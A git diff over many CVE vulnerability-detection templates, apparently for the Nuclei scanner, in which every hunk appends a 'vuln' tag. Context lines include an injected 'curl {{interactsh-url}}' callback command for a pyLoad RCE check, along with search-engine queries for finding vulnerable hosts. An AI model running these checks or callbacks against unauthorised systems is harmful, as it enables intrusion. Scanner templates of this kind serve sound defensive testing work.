a/http/cves/2022/CVE-2022-48197.yaml b/http/cves/2022/CVE-2022-48197.yaml index cfcd2f57551..82729f93157 100644 --- a/http/cves/2022/CVE-2022-48197.yaml +++ b/http/cves/2022/CVE-2022-48197.yaml @@ -30,7 +30,7 @@ info: - html:"bower_components/yui2/" - http.html:"bower_components/yui2/" fofa-query: body="bower_components/yui2/" - tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project + tags: cve,cve2022,packetstorm,yui2,xss,yahoo,treeview,yui_project,vuln http: - method: GET diff --git a/http/cves/2022/CVE-2022-48323.yaml b/http/cves/2022/CVE-2022-48323.yaml index a052e85dc45..d53998be434 100644 --- a/http/cves/2022/CVE-2022-48323.yaml +++ b/http/cves/2022/CVE-2022-48323.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: sunlogin product: sunflower - tags: cve,cve2022,sunflower,rce,vkev + tags: cve,cve2022,sunflower,rce,vkev,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-4897.yaml b/http/cves/2022/CVE-2022-4897.yaml index 66349002657..19777f99d4d 100644 --- a/http/cves/2022/CVE-2022-4897.yaml +++ b/http/cves/2022/CVE-2022-4897.yaml @@ -28,7 +28,7 @@ info: vendor: ithemes product: backupbuddy framework: wordpress - tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated,ithemes + tags: cve,cve2022,xss,backupbuddy,wordpress,wp-plugin,wpscan,wp,authenticated,ithemes,vuln http: - raw: diff --git a/http/cves/2022/CVE-2022-4971.yaml b/http/cves/2022/CVE-2022-4971.yaml index dfcabf30d70..57ec4b36d2f 100644 --- a/http/cves/2022/CVE-2022-4971.yaml +++ b/http/cves/2022/CVE-2022-4971.yaml @@ -28,7 +28,7 @@ info: fofa-query: body=/wp-content/plugins/sassy-social-share/ publicwww-query: /wp-content/plugins/sassy-social-share/ google-query: inurl:"/wp-content/plugins/sassy-social-share" - tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,sassy-social-share,xss,authenticated,vkev + tags: wpscan,cve,cve2022,wordpress,wp-plugin,wp,sassy-social-share,xss,authenticated,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0037.yaml b/http/cves/2023/CVE-2023-0037.yaml index 52c597211b6..2270aa8a189 100644 --- a/http/cves/2023/CVE-2023-0037.yaml +++ b/http/cves/2023/CVE-2023-0037.yaml @@ -26,7 +26,7 @@ info: product: map_builder_for_google_maps framework: wordpress zoomeye-query: http.body="wp-content/plugins/wd-google-maps" - tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based,vkev + tags: wpscan,cve,cve2023,wordpress,wp-plugin,wp,wd-google-maps,sqli,time-based,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0099.yaml b/http/cves/2023/CVE-2023-0099.yaml index 22b10f1f024..9bdf43faf3a 100644 --- a/http/cves/2023/CVE-2023-0099.yaml +++ b/http/cves/2023/CVE-2023-0099.yaml @@ -29,7 +29,7 @@ info: vendor: getlasso product: simple_urls framework: wordpress - tags: wpscan,packetstorm,cve,cve2023,xss,simple-urls,authenticated,wordpress,wp,wp-plugin,getlasso + tags: wpscan,packetstorm,cve,cve2023,xss,simple-urls,authenticated,wordpress,wp,wp-plugin,getlasso,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0126.yaml b/http/cves/2023/CVE-2023-0126.yaml index cf36af8bc68..7a4039382f0 100644 --- a/http/cves/2023/CVE-2023-0126.yaml +++ b/http/cves/2023/CVE-2023-0126.yaml @@ -32,7 +32,7 @@ info: shodan-query: title:"Appliance Management Console Login" fofa-query: title="appliance management console login" google-query: intitle:"appliance management console login" - tags: cve2023,cve,sonicwall,lfi,sma1000 + tags: cve2023,cve,sonicwall,lfi,sma1000,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-0159.yaml b/http/cves/2023/CVE-2023-0159.yaml index a5fa555ffeb..1356fdc1749 100644 --- a/http/cves/2023/CVE-2023-0159.yaml +++ b/http/cves/2023/CVE-2023-0159.yaml @@ -28,7 +28,7 @@ info: shodan-query: "http.html:/wp-content/plugins/extensive-vc-addon/" fofa-query: "body=/wp-content/plugins/extensive-vc-addon/" publicwww-query: "/wp-content/plugins/extensive-vc-addon/" - tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize,vkev + tags: cve,cve2023,wordpress,wpbakery,wp-plugin,lfi,extensive-vc-addon,wprealize,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0236.yaml b/http/cves/2023/CVE-2023-0236.yaml index 824b2ea3398..982677346a5 100644 --- a/http/cves/2023/CVE-2023-0236.yaml +++ b/http/cves/2023/CVE-2023-0236.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/tutor/ fofa-query: body=/wp-content/plugins/tutor/ publicwww-query: /wp-content/plugins/tutor/ - tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum + tags: cve2023,cve,xss,tutorlms,wpscan,wordpress,wp-plugin,authenticated,themeum,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0261.yaml b/http/cves/2023/CVE-2023-0261.yaml index 77c9fcec593..58aecc976eb 100644 --- a/http/cves/2023/CVE-2023-0261.yaml +++ b/http/cves/2023/CVE-2023-0261.yaml @@ -28,7 +28,7 @@ info: vendor: ljapps product: wp_tripadvisor_review_slider framework: wordpress - tags: time-based-sqli,cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps + tags: time-based-sqli,cve2023,cve,wordpress,wp,wp-tripadvisor-review-slider,auth,sqli,wp-plugin,wpscan,ljapps,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0297.yaml b/http/cves/2023/CVE-2023-0297.yaml index fed400de380..07e24df0b7c 100644 --- a/http/cves/2023/CVE-2023-0297.yaml +++ b/http/cves/2023/CVE-2023-0297.yaml @@ -42,7 +42,7 @@ info: - intitle:"login - pyload" - intitle:"pyload" zoomeye-query: app="pyLoad" - tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast,vkev + tags: cve,cve2023,huntr,packetstorm,rce,pyload,oast,vkev,vuln variables: cmd: "curl {{interactsh-url}}" diff --git a/http/cves/2023/CVE-2023-0334.yaml b/http/cves/2023/CVE-2023-0334.yaml index b0c0fc89745..1937b598887 100644 --- a/http/cves/2023/CVE-2023-0334.yaml +++ b/http/cves/2023/CVE-2023-0334.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/shortpixel-adaptive-images/ fofa-query: body=/wp-content/plugins/shortpixel-adaptive-images/ publicwww-query: /wp-content/plugins/shortpixel-adaptive-images/ - tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel + tags: cve2023,cve,xss,wpscan,wordpress,wp-plugin,wp,shortpixel-adaptive-images,shortpixel,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-0448.yaml b/http/cves/2023/CVE-2023-0448.yaml index 633ef7bb5be..feaf78d86f2 100644 --- a/http/cves/2023/CVE-2023-0448.yaml +++ b/http/cves/2023/CVE-2023-0448.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/wp-helper-lite fofa-query: body=/wp-content/plugins/wp-helper-lite publicwww-query: "/wp-content/plugins/wp-helper-lite" - tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao + tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-0514.yaml b/http/cves/2023/CVE-2023-0514.yaml index cd80a3c45a0..4b86cf1dc26 100644 --- a/http/cves/2023/CVE-2023-0514.yaml +++ b/http/cves/2023/CVE-2023-0514.yaml @@ -28,7 +28,7 @@ info: vendor: membership_database_project product: membership_database framework: wordpress - tags: cve2023,cve,wpscan,membership-database,wp,wp-plugin,wordpress,authenticated,xss,membership_database_project + tags: cve2023,cve,wpscan,membership-database,wp,wp-plugin,wordpress,authenticated,xss,membership_database_project,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0527.yaml b/http/cves/2023/CVE-2023-0527.yaml index bf31e581f20..7a1ccc8d2d6 100644 --- a/http/cves/2023/CVE-2023-0527.yaml +++ b/http/cves/2023/CVE-2023-0527.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: online_security_guards_hiring_system_project product: online_security_guards_hiring_system - tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project + tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0552.yaml b/http/cves/2023/CVE-2023-0552.yaml index 5bfde840a1b..2f29b230bc3 100644 --- a/http/cves/2023/CVE-2023-0552.yaml +++ b/http/cves/2023/CVE-2023-0552.yaml @@ -25,7 +25,7 @@ info: vendor: genetechsolutions product: pie_register framework: wordpress - tags: cve2023,cve,redirect,pie,pie-register,wpscan,genetechsolutions,wordpress,vkev + tags: cve2023,cve,redirect,pie,pie-register,wpscan,genetechsolutions,wordpress,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-0562.yaml b/http/cves/2023/CVE-2023-0562.yaml index 9e464e21061..a1b6eeac9e1 100644 --- a/http/cves/2023/CVE-2023-0562.yaml +++ b/http/cves/2023/CVE-2023-0562.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: phpgurukul product: bank_locker_management_system - tags: cve,cve2023,blms,sqli,bypass,phpgurukul + tags: cve,cve2023,blms,sqli,bypass,phpgurukul,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0563.yaml b/http/cves/2023/CVE-2023-0563.yaml index ddf43b2a0dd..f8c04f6b722 100644 --- a/http/cves/2023/CVE-2023-0563.yaml +++ b/http/cves/2023/CVE-2023-0563.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: phpgurukul product: bank_locker_management_system - tags: cve2023,cve,blms,xss,phpgurukul + tags: cve2023,cve,blms,xss,phpgurukul,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0600.yaml b/http/cves/2023/CVE-2023-0600.yaml index 0103c44dc92..d8b2cf591cc 100644 --- a/http/cves/2023/CVE-2023-0600.yaml +++ b/http/cves/2023/CVE-2023-0600.yaml @@ -29,7 +29,7 @@ info: fofa-query: body="wp-stats-manager" google-query: inurl:"/wp-content/plugins/wp-stats-manager" public-www: /wp-content/plugins/wp-stats-manager/ - tags: time-based-sqli,cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market,vkev + tags: time-based-sqli,cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market,vkev,vuln variables: str: '{{rand_int(100000, 999999)}}' diff --git a/http/cves/2023/CVE-2023-0602.yaml b/http/cves/2023/CVE-2023-0602.yaml index a4c344196f7..c78b73bf8c6 100644 --- a/http/cves/2023/CVE-2023-0602.yaml +++ b/http/cves/2023/CVE-2023-0602.yaml @@ -24,7 +24,7 @@ info: vendor: johnniejodelljr product: twittee_text_tweet framework: wordpress - tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr + tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0630.yaml b/http/cves/2023/CVE-2023-0630.yaml index 2b53671bf7f..ff692390be3 100644 --- a/http/cves/2023/CVE-2023-0630.yaml +++ b/http/cves/2023/CVE-2023-0630.yaml @@ -29,7 +29,7 @@ info: vendor: wp-slimstat product: slimstat_analytics framework: wordpress - tags: time-based-sqli,cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated + tags: time-based-sqli,cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0669.yaml b/http/cves/2023/CVE-2023-0669.yaml index 9a63a8a0638..73aedf66e7a 100644 --- a/http/cves/2023/CVE-2023-0669.yaml +++ b/http/cves/2023/CVE-2023-0669.yaml @@ -37,7 +37,7 @@ info: - icon_hash=1484947000 - icon_hash=1484947000,1828756398,1170495932 zoomeye-query: app="fortra goanywhere-mft" - tags: cve2023,cve,rce,goanywhere,oast,kev,fortra,vkev + tags: cve2023,cve,rce,goanywhere,oast,kev,fortra,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0676.yaml b/http/cves/2023/CVE-2023-0676.yaml index 090f164c7b8..30e6bfa8c0b 100644 --- a/http/cves/2023/CVE-2023-0676.yaml +++ b/http/cves/2023/CVE-2023-0676.yaml @@ -25,7 +25,7 @@ info: vendor: phpipam product: phpipam shodan-query: html:"phpIPAM IP address management" - tags: cve,cve2023,phpipam,xss,authenticated + tags: cve,cve2023,phpipam,xss,authenticated,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0678.yaml b/http/cves/2023/CVE-2023-0678.yaml index 9e0128a3d77..d5c2dfee723 100644 --- a/http/cves/2023/CVE-2023-0678.yaml +++ b/http/cves/2023/CVE-2023-0678.yaml @@ -24,7 +24,7 @@ info: - "html:\"phpIPAM IP address management\"" - http.html:"phpipam ip address management" fofa-query: "body=\"phpipam ip address management\"" - tags: cve,cve2023,php,phpipam,unauth + tags: cve,cve2023,php,phpipam,unauth,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-0777.yaml b/http/cves/2023/CVE-2023-0777.yaml index 177729bcfca..14bd6969a8e 100644 --- a/http/cves/2023/CVE-2023-0777.yaml +++ b/http/cves/2023/CVE-2023-0777.yaml @@ -33,7 +33,7 @@ info: - body="Modoboa" - body="modoboa" - icon_hash=1949005079 - tags: cve2023,cve,huntr,packetstorm,modoboa,default-login + tags: cve2023,cve,huntr,packetstorm,modoboa,default-login,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0876.yaml b/http/cves/2023/CVE-2023-0876.yaml index d51b5bf65b0..abf875f87c9 100644 --- a/http/cves/2023/CVE-2023-0876.yaml +++ b/http/cves/2023/CVE-2023-0876.yaml @@ -25,7 +25,7 @@ info: vendor: joomunited product: wp_meta_seo framework: wordpress - tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,wp-meta-seo,redirect,vkev + tags: wpscan,cve,cve2023,wp,wp-plugin,wordpress,wp-meta-seo,redirect,vkev,vuln variables: link_endpoint: "{{rand_text_numeric(5)}}" diff --git a/http/cves/2023/CVE-2023-0900.yaml b/http/cves/2023/CVE-2023-0900.yaml index c5f15b447b9..ea3b522e37c 100644 --- a/http/cves/2023/CVE-2023-0900.yaml +++ b/http/cves/2023/CVE-2023-0900.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:wp-content/plugins/ap-pricing-tables-lite fofa-query: body=wp-content/plugins/ap-pricing-tables-lite publicwww-query: "wp-content/plugins/ap-pricing-tables-lite" - tags: time-based-sqli,cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart + tags: time-based-sqli,cve2023,cve,sqli,wordpress,wp-plugin,wp,authenticated,wpscan,ap-pricing-tables-lite,wpdevart,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0942.yaml b/http/cves/2023/CVE-2023-0942.yaml index 465a35a5b02..74c3303f4f7 100644 --- a/http/cves/2023/CVE-2023-0942.yaml +++ b/http/cves/2023/CVE-2023-0942.yaml @@ -29,7 +29,7 @@ info: vendor: artisanworkshop product: japanized_for_woocommerce framework: wordpress - tags: cve2023,cve,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,xss,woocommerce,plugin,artisanworkshop + tags: cve2023,cve,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,xss,woocommerce,plugin,artisanworkshop,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0947.yaml b/http/cves/2023/CVE-2023-0947.yaml index 87922bae74a..392fdb5baf0 100644 --- a/http/cves/2023/CVE-2023-0947.yaml +++ b/http/cves/2023/CVE-2023-0947.yaml @@ -29,7 +29,7 @@ info: fofa-query: - body="flatpress" - icon_hash=-1189292869 - tags: cve,cve2023,huntr,lfi,flatpress,listing + tags: cve,cve2023,huntr,lfi,flatpress,listing,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-0948.yaml b/http/cves/2023/CVE-2023-0948.yaml index b8b229d72f4..219f2d27136 100644 --- a/http/cves/2023/CVE-2023-0948.yaml +++ b/http/cves/2023/CVE-2023-0948.yaml @@ -27,7 +27,7 @@ info: vendor: artisanworkshop product: japanized_for_woocommerce framework: wordpress - tags: cve,cve2023,wpscan,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated,artisanworkshop + tags: cve,cve2023,wpscan,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated,artisanworkshop,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-0968.yaml b/http/cves/2023/CVE-2023-0968.yaml index 01dfde8afc2..e20306afbe6 100644 --- a/http/cves/2023/CVE-2023-0968.yaml +++ b/http/cves/2023/CVE-2023-0968.yaml @@ -29,7 +29,7 @@ info: vendor: kibokolabs product: watu_quiz framework: wordpress - tags: cve2023,cve,wordpress,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs + tags: cve2023,cve,wordpress,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1020.yaml b/http/cves/2023/CVE-2023-1020.yaml index 5d1332d89bc..e80836e1669 100644 --- a/http/cves/2023/CVE-2023-1020.yaml +++ b/http/cves/2023/CVE-2023-1020.yaml @@ -26,7 +26,7 @@ info: vendor: wp_live_chat_shoutbox_project product: wp_live_chat_shoutbox framework: wordpress - tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project,vkev + tags: cve2023,cve,wpscan,sqli,wordpress,wp-plugin,wp,wp-shoutbox-live-chat,wp_live_chat_shoutbox_project,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1080.yaml b/http/cves/2023/CVE-2023-1080.yaml index 6f820e4d294..fa4b854bcab 100644 --- a/http/cves/2023/CVE-2023-1080.yaml +++ b/http/cves/2023/CVE-2023-1080.yaml @@ -29,7 +29,7 @@ info: vendor: gnpublisher product: gn_publisher framework: wordpress - tags: cve2023,cve,wp-plugin,wordpress,gn-publisher,authenticated,wp,xss,wpscan,gnpublisher + tags: cve2023,cve,wp-plugin,wordpress,gn-publisher,authenticated,wp,xss,wpscan,gnpublisher,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1119.yaml b/http/cves/2023/CVE-2023-1119.yaml index 359cb6bb958..41dd49d547c 100644 --- a/http/cves/2023/CVE-2023-1119.yaml +++ b/http/cves/2023/CVE-2023-1119.yaml @@ -24,7 +24,7 @@ info: vendor: wordpress product: wp-optimize,srbtranslatin fofa-query: body="/wp-content/plugins/wp-optimize" - tags: cve,cve2023,wp,wp-plugin,wordpress,wp-optimize,xss,vkev + tags: cve,cve2023,wp,wp-plugin,wordpress,wp-optimize,xss,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1177.yaml b/http/cves/2023/CVE-2023-1177.yaml index 480fd43cf55..a7187c8d8d8 100644 --- a/http/cves/2023/CVE-2023-1177.yaml +++ b/http/cves/2023/CVE-2023-1177.yaml @@ -34,7 +34,7 @@ info: - title="mlflow" - app="mlflow" google-query: intitle:"mlflow" - tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vkev + tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1263.yaml b/http/cves/2023/CVE-2023-1263.yaml index bb11fa84607..44471615128 100644 --- a/http/cves/2023/CVE-2023-1263.yaml +++ b/http/cves/2023/CVE-2023-1263.yaml @@ -30,7 +30,7 @@ info: shodan-query: http.html:/wp-content/plugins/cmp-coming-soon-maintenance/ fofa-query: body=/wp-content/plugins/cmp-coming-soon-maintenance/ publicwww-query: "/wp-content/plugins/cmp-coming-soon-maintenance/" - tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes + tags: cve,cve2023,wordpress,wpscan,wp-plugin,wp,cmp-coming-soon-maintenance,unauth,niteothemes,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1315.yaml b/http/cves/2023/CVE-2023-1315.yaml index d3c2bbe76e0..2f54720606d 100644 --- a/http/cves/2023/CVE-2023-1315.yaml +++ b/http/cves/2023/CVE-2023-1315.yaml @@ -28,7 +28,7 @@ info: shodan-query: title:"osTicket" fofa-query: title="osticket" google-query: intitle:"osticket" - tags: cve,cve2023,osticket,xss,authenticated + tags: cve,cve2023,osticket,xss,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-1317.yaml b/http/cves/2023/CVE-2023-1317.yaml index e23044682e6..f222f7558bc 100644 --- a/http/cves/2023/CVE-2023-1317.yaml +++ b/http/cves/2023/CVE-2023-1317.yaml @@ -28,7 +28,7 @@ info: shodan-query: title:"osTicket" fofa-query: title="osticket" google-query: intitle:"osticket" - tags: cve,cve2023,osticket,xss,authenticated + tags: cve,cve2023,osticket,xss,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-1318.yaml b/http/cves/2023/CVE-2023-1318.yaml index 5b5213fb6e6..0656cc832c2 100644 --- a/http/cves/2023/CVE-2023-1318.yaml +++ b/http/cves/2023/CVE-2023-1318.yaml @@ -28,7 +28,7 @@ info: shodan-query: title:"osTicket" fofa-query: title="osticket" google-query: intitle:"osticket" - tags: cve,cve2023,osticket,xss,authenticated + tags: cve,cve2023,osticket,xss,authenticated,vuln flow: http(1) && http(2) diff --git a/http/cves/2023/CVE-2023-1362.yaml b/http/cves/2023/CVE-2023-1362.yaml index d316baaa455..0b801d29e12 100644 --- a/http/cves/2023/CVE-2023-1362.yaml +++ b/http/cves/2023/CVE-2023-1362.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: bumsys_project product: bumsys - tags: cve,cve2023,bumsys,clickjacking,huntr,bumsys_project + tags: cve,cve2023,bumsys,clickjacking,huntr,bumsys_project,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-1389.yaml b/http/cves/2023/CVE-2023-1389.yaml index 544e02c8eb6..c8e37b8153f 100644 --- a/http/cves/2023/CVE-2023-1389.yaml +++ b/http/cves/2023/CVE-2023-1389.yaml @@ -26,7 +26,7 @@ info: fofa-query: body="tp-link" shodan-query: 'title:"TP-Link Router"' verified: true - tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev,vkev + tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1408.yaml b/http/cves/2023/CVE-2023-1408.yaml index 0aab1b454a3..3abbb375088 100644 --- a/http/cves/2023/CVE-2023-1408.yaml +++ b/http/cves/2023/CVE-2023-1408.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/video-list-manager/ fofa-query: body=/wp-content/plugins/video-list-manager/ publicwww-query: /wp-content/plugins/video-list-manager/ - tags: time-based-sqli,cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project + tags: time-based-sqli,cve,cve2023,wpscan,sqli,wordpress,wp-plugin,wp,authenticated,video_list_manager_project,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1434.yaml b/http/cves/2023/CVE-2023-1434.yaml index 5cb34675ccd..4ec8f6ba8e9 100644 --- a/http/cves/2023/CVE-2023-1434.yaml +++ b/http/cves/2023/CVE-2023-1434.yaml @@ -23,7 +23,7 @@ info: shodan-query: title:"Odoo" product: odoo vendor: odoo - tags: cve2023,cve,odoo,xss,vkev + tags: cve2023,cve,odoo,xss,vkev,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-1454.yaml b/http/cves/2023/CVE-2023-1454.yaml index 437bb88935f..a7e15f86dd7 100644 --- a/http/cves/2023/CVE-2023-1454.yaml +++ b/http/cves/2023/CVE-2023-1454.yaml @@ -31,7 +31,7 @@ info: product: jeecg-boot shodan-query: http.favicon.hash:1380908726 fofa-query: icon_hash=1380908726 - tags: cve2023,cve,jeecg,sqli,vkev + tags: cve2023,cve,jeecg,sqli,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1496.yaml b/http/cves/2023/CVE-2023-1496.yaml index 833880f4cca..2298e85a719 100644 --- a/http/cves/2023/CVE-2023-1496.yaml +++ b/http/cves/2023/CVE-2023-1496.yaml @@ -28,7 +28,7 @@ info: shodan-query: - "Server: imgproxy" - "server: imgproxy" - tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians + tags: cve,cve2023,huntr,imgproxy,xss,svg,evilmartians,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-1546.yaml b/http/cves/2023/CVE-2023-1546.yaml index 5bc5c13b401..aaa8c53dbf0 100644 --- a/http/cves/2023/CVE-2023-1546.yaml +++ b/http/cves/2023/CVE-2023-1546.yaml @@ -26,7 +26,7 @@ info: vendor: plainviewplugins product: mycryptocheckout framework: wordpress - tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated,plainviewplugins + tags: cve,cve2023,wordpress,wp,wp-plugin,xss,wpscan,authenticated,plainviewplugins,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1671.yaml b/http/cves/2023/CVE-2023-1671.yaml index 9e3724f2f69..148ed037f79 100644 --- a/http/cves/2023/CVE-2023-1671.yaml +++ b/http/cves/2023/CVE-2023-1671.yaml @@ -38,7 +38,7 @@ info: - title="sophos web appliance" - icon_hash=-893681401 google-query: intitle:"sophos web appliance" - tags: cve2023,cve,packetstorm,rce,sophos,oast,kev,vkev + tags: cve2023,cve,packetstorm,rce,sophos,oast,kev,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1698.yaml b/http/cves/2023/CVE-2023-1698.yaml index 58c4ce3641d..0c035f0d2e3 100644 --- a/http/cves/2023/CVE-2023-1698.yaml +++ b/http/cves/2023/CVE-2023-1698.yaml @@ -32,7 +32,7 @@ info: - html:"/wbm/" html:"wago" - http.html:"/wbm/" html:"wago" fofa-query: body="/wbm/" html:"wago" - tags: cve2023,cve,wago,rce,vkev + tags: cve2023,cve,wago,rce,vkev,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1719.yaml b/http/cves/2023/CVE-2023-1719.yaml index a31e59a324b..38a12967e06 100644 --- a/http/cves/2023/CVE-2023-1719.yaml +++ b/http/cves/2023/CVE-2023-1719.yaml @@ -27,7 +27,7 @@ info: - html:"/bitrix/" - http.html:"/bitrix/" fofa-query: body="/bitrix/" - tags: cve2023,cve,bitrix,xss,bitrix24 + tags: cve2023,cve,bitrix,xss,bitrix24,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-1730.yaml b/http/cves/2023/CVE-2023-1730.yaml index c1cbac5ff15..c64ca9c85b3 100644 --- a/http/cves/2023/CVE-2023-1730.yaml +++ b/http/cves/2023/CVE-2023-1730.yaml @@ -28,7 +28,7 @@ info: vendor: supportcandy product: supportcandy framework: wordpress - tags: time-based-sqli,cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth + tags: time-based-sqli,cve2023,cve,sqli,wpscan,wordpress,supportcandy,unauth,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1780.yaml b/http/cves/2023/CVE-2023-1780.yaml index 95f137690a2..234e7455c16 100644 --- a/http/cves/2023/CVE-2023-1780.yaml +++ b/http/cves/2023/CVE-2023-1780.yaml @@ -27,7 +27,7 @@ info: shodan-query: http.html:/wp-content/plugins/companion-sitemap-generator/ fofa-query: body=/wp-content/plugins/companion-sitemap-generator/ publicwww-query: "/wp-content/plugins/companion-sitemap-generator/" - tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer + tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1835.yaml b/http/cves/2023/CVE-2023-1835.yaml index 42b2b4c1115..db71626d03e 100644 --- a/http/cves/2023/CVE-2023-1835.yaml +++ b/http/cves/2023/CVE-2023-1835.yaml @@ -31,7 +31,7 @@ info: shodan-query: http.html:/wp-content/plugins/ninja-forms/ fofa-query: body=/wp-content/plugins/ninja-forms/ publicwww-query: /wp-content/plugins/ninja-forms/ - tags: cve2023,cve,wpscan,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms + tags: cve2023,cve,wpscan,ninja,forms,wp,wp-plugin,wordpress,authenticated,xss,ninjaforms,vuln http: - raw: diff --git a/http/cves/2023/CVE-2023-1880.yaml b/http/cves/2023/CVE-2023-1880.yaml index 0a9b731927f..7a42d1b3f98 100644 --- a/http/cves/2023/CVE-2023-1880.yaml +++ b/http/cves/2023/CVE-2023-1880.yaml @@ -26,7 +26,7 @@ info: product: phpmyfaq shodan-query: http.html:"phpmyfaq" fofa-query: body="phpmyfaq" - tags: cve2023,cve,huntr,xss,phpmyfaq + tags: cve2023,cve,huntr,xss,phpmyfaq,vuln http: - method: GET diff --git a/http/cves/2023/CVE-2023-1890.yaml b/http/cves/2023/CVE-2023-1890.yaml index 98dd9f89177..73f8563c6ed 100644 --- a/http/cves/2023/CVE-2023-1890.yaml +++ b/http/cves/2023/CVE-2023-1890.yaml @@ -27,7 +27,7 @@ info: vendor: pauple 